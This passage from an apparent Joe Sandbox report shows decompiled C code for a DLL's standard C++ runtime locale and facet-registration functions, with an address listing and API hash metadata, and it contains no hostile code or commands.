				_t77 = E6E1E161C(0x6e2c6cc4);
				_t164 = _a8;
				_t78 = E6E1E171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t214, _t220, 0x14);
							E6E206653( &_v20, 0);
							_t221 =  *0x6e2c6cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6E1E161C(0x6e2c6b38);
							_t171 = _a8;
							_t215 = E6E1E171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20A9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t161, _t215, _t221, 0x14);
										E6E206653( &_v20, 0);
										_t222 =  *0x6e2c6ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6E1E161C(0x6e2c6cb8);
										_t178 = _a8;
										_t216 = E6E1E171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t161, _t216, _t222, 0x14);
													E6E206653( &_v20, 0);
													_t223 =  *0x6e2c6cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6E1E161C(0x6e2c6cbc);
													_t185 = _a8;
													_t217 = E6E1E171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438( &_v32);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t161, _t217, _t223, 0x14);
																E6E206653( &_v20, 0);
																_t224 =  *0x6e2c6cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6E1E161C(0x6e2c6cc0);
																_t192 = _a8;
																_t218 = E6E1E171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6E2066BA( &_v20);
																	return E6E220075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6E20AB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6E1E1438(_t196);
																			E6E223D74( &_v32, 0x6e2c3504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6e26ba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6E206FD3(__eflags, _t218);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6e2c6cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6E206FD3(__eflags, _t217);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6e2c6cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6E206FD3(__eflags, _t216);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6e2c6ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6E206FD3(__eflags, _t215);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6e2c6cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6E206FD3(__eflags, _t214);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6e2c6cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

























                          0x6e20a059
                          0x6e20a059
                          0x6e20a060
                          0x6e20a06a
                          0x6e20a06f
                          0x6e20a07a
                          0x6e20a07e
                          0x6e20a081
                          0x6e20a086
                          0x6e20a08a
                          0x6e20a08f
                          0x6e20a093
                          0x6e20a0d8
                          0x6e20a0db
                          0x6e20a0e7
                          0x6e20a095
                          0x6e20a097
                          0x6e20a09d
                          0x6e20a0a3
                          0x6e20a0ab
                          0x6e20a0ae
                          0x6e20a0eb
                          0x6e20a0f9
                          0x6e20a0fe
                          0x6e20a106
                          0x6e20a110
                          0x6e20a115
                          0x6e20a120
                          0x6e20a124
                          0x6e20a127
                          0x6e20a12c
                          0x6e20a135
                          0x6e20a137
                          0x6e20a139
                          0x6e20a17e
                          0x6e20a181
                          0x6e20a18d
                          0x6e20a13b
                          0x6e20a13b
                          0x6e20a13d
                          0x6e20a143
                          0x6e20a149
                          0x6e20a151
                          0x6e20a154
                          0x6e20a191
                          0x6e20a19f
                          0x6e20a1a4
                          0x6e20a1ac
                          0x6e20a1b6
                          0x6e20a1bb
                          0x6e20a1c6
                          0x6e20a1ca
                          0x6e20a1cd
                          0x6e20a1d2
                          0x6e20a1db
                          0x6e20a1dd
                          0x6e20a1df
                          0x6e20a224
                          0x6e20a227
                          0x6e20a233
                          0x6e20a1e1
                          0x6e20a1e1
                          0x6e20a1e3
                          0x6e20a1e9
                          0x6e20a1ef
                          0x6e20a1f7
                          0x6e20a1fa
                          0x6e20a237
                          0x6e20a245
                          0x6e20a24a
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a281
                          0x6e20a283
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289
                          0x6e20a1fc
                          0x6e20a1fc
                          0x6e20a1ff
                          0x6e20a203
                          0x6e20a207
                          0x6e20a214
                          0x6e20a21c
                          0x6e20a21e
                          0x00000000
                          0x6e20a21e
                          0x6e20a1e5
                          0x6e20a1e5
                          0x00000000
                          0x6e20a1e5
                          0x6e20a1e3
                          0x6e20a156
                          0x6e20a156
                          0x6e20a159
                          0x6e20a15d
                          0x6e20a161
                          0x6e20a16e
                          0x6e20a176
                          0x6e20a178
                          0x00000000
                          0x6e20a178
                          0x6e20a13f
                          0x6e20a13f
                          0x00000000
                          0x6e20a13f
                          0x6e20a13d
                          0x6e20a0b0
                          0x6e20a0b0
                          0x6e20a0b3
                          0x6e20a0b7
                          0x6e20a0bb
                          0x6e20a0c8
                          0x6e20a0d0
                          0x6e20a0d2
                          0x00000000
                          0x6e20a0d2
                          0x6e20a099
                          0x6e20a099
                          0x00000000
                          0x6e20a099
                          0x6e20a097

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A060
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A06A
                          • int.LIBCPMT ref: 6E20A081
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E20A0A4
                          • std::_Facet_Register.LIBCPMT ref: 6E20A0BB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A0DB
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A0F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID:
                          • API String ID: 2594415655-0
                          • Opcode ID: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
                          • Instruction ID: 962cb3cc37723b47a9a2c980b112aa3f0b7d4fa8a928716d4613960256540487
                          • Opcode Fuzzy Hash: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
                          • Instruction Fuzzy Hash: 9111C6B691052DDBCF01DBE4C898AEDB77BBF44B15F544908E4106B2D0DFB49A48C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F183, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t814 - 0x14, 0);
				_t777 =  *0x6e2c6de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6E1E161C(0x6e2c6d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6E2066BA(_t814 - 0x14);
					return E6E220075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6E210EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t814 - 0x20);
							E6E223D74(_t814 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t758, _t777, 0x14);
							E6E206653(_t814 - 0x14, 0);
							_t778 =  *0x6e2c6db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6E1E161C(0x6e2c6d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6E2066BA(_t814 - 0x14);
								return E6E220075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6E210F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t814 - 0x20);
										E6E223D74(_t814 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t575, _t759, _t778, 0x14);
										E6E206653(_t814 - 0x14, 0);
										_t779 =  *0x6e2c6dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6E1E161C(0x6e2c6d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6E2066BA(_t814 - 0x14);
											return E6E220075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6E210F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t814 - 0x20);
													E6E223D74(_t814 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t575, _t760, _t779, 0x14);
													E6E206653(_t814 - 0x14, 0);
													_t780 =  *0x6e2c6dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6E1E161C(0x6e2c6d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6E2066BA(_t814 - 0x14);
														return E6E220075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6E210FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t814 - 0x20);
																E6E223D74(_t814 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t575, _t761, _t780, 0x14);
																E6E206653(_t814 - 0x14, 0);
																_t781 =  *0x6e2c6df0; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6E1E161C(0x6e2c6d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6E2066BA(_t814 - 0x14);
																	return E6E220075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6E211057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t814 - 0x20);
																			E6E223D74(_t814 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t575, _t762, _t781, 0x14);
																			E6E206653(_t814 - 0x14, 0);
																			_t782 =  *0x6e2c6dc0; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6E1E161C(0x6e2c6d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6E2066BA(_t814 - 0x14);
																				return E6E220075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6E2110BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t814 - 0x20);
																						E6E223D74(_t814 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t575, _t763, _t782, 0x14);
																						E6E206653(_t814 - 0x14, 0);
																						_t783 =  *0x6e2c6df8; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6E1E161C(0x6e2c6da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6E2066BA(_t814 - 0x14);
																							return E6E220075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6E211127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t814 - 0x20);
																									E6E223D74(_t814 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t575, _t764, _t783, 0x14);
																									E6E206653(_t814 - 0x14, 0);
																									_t784 =  *0x6e2c6df4; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6E1E161C(0x6e2c6da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6E2066BA(_t814 - 0x14);
																										return E6E220075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6E2111AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t814 - 0x20);
																												E6E223D74(_t814 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t575, _t765, _t784, 0x14);
																												E6E206653(_t814 - 0x14, 0);
																												_t785 =  *0x6e2c6dc8; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6E1E161C(0x6e2c6d7c);
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6E2066BA(_t814 - 0x14);
																													return E6E220075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6E211230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t814 - 0x20);
																															E6E223D74(_t814 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t575, _t766, _t785, 0x14);
																															E6E206653(_t814 - 0x14, 0);
																															_t786 =  *0x6e2c6dc4; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6E1E161C(0x6e2c6d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6E2066BA(_t814 - 0x14);
																																return E6E220075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6E2112B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t814 - 0x20);
																																		E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t575, _t767, _t786, 0x14);
																																		E6E206653(_t814 - 0x14, 0);
																																		_t787 =  *0x6e2c6dd8; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6E1E161C(0x6e2c6d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6E2066BA(_t814 - 0x14);
																																			return E6E220075(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(_t787 == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6E211339(_t575, _t648, _t756, _t768, _t787) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t814 - 0x20);
																																					E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t575, _t768, _t787, 0x14);
																																					E6E206653(_t814 - 0x14, 0);
																																					_t788 =  *0x6e2c6db0; // 0x0
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6E1E161C(0x6e2c6d64);
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6E2066BA(_t814 - 0x14);
																																						return E6E220075(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(_t788 == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6E2113A1(_t575, _t655, _t756, _t769, _t788) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t814 - 0x20);
																																								E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t575, _t769, _t788, 0x14);
																																								E6E206653(_t814 - 0x14, 0);
																																								_t789 =  *0x6e2c6ddc; // 0x0
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6E1E161C(0x6e2c6d88);
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
																																								_t770 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6E2066BA(_t814 - 0x14);
																																									return E6E220075(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(_t789 == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6E211409(_t575, _t662, _t756, _t770, _t789) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t814 - 0x20);
																																											E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t575, _t770, _t789, 0x14);
																																											E6E206653(_t814 - 0x14, 0);
																																											_t790 =  *0x6e2c6de0; // 0x0
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6E1E161C(0x6e2c6d8c);
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6E2066BA(_t814 - 0x14);
																																												return E6E220075(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(_t790 == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6E211471(_t575, _t669, _t756, _t771, _t790) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t814 - 0x20);
																																														E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t575, _t771, _t790, 0x14);
																																														E6E206653(_t814 - 0x14, 0);
																																														_t791 =  *0x6e2c6dfc; // 0x0
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6E1E161C(0x6e2c6da8);
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6E2066BA(_t814 - 0x14);
																																															return E6E220075(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(_t791 == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6E2114EC(_t575, _t676, _t756, _t772, _t791) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t814 - 0x20);
																																																	E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t575, _t772, _t791, 0x14);
																																																	E6E206653(_t814 - 0x14, 0);
																																																	_t792 =  *0x6e2c6dcc; // 0x0
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6E1E161C(0x6e2c6d80);
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6E2066BA(_t814 - 0x14);
																																																		return E6E220075(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(_t792 == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6E211558(_t575, _t683, _t756, _t773, _t792) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t814 - 0x20);
																																																				E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t575, _t773, _t792, 0x14);
																																																				E6E206653(_t814 - 0x14, 0);
																																																				_t793 =  *0x6e2c6e00; // 0x0
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6E1E161C(0x6e2c6dac);
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6E2066BA(_t814 - 0x14);
																																																					return E6E220075(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(_t793 == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6E2115C4(_t575, _t690, _t756, _t774, _t793) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t814 - 0x20);
																																																							E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																							asm("int3");
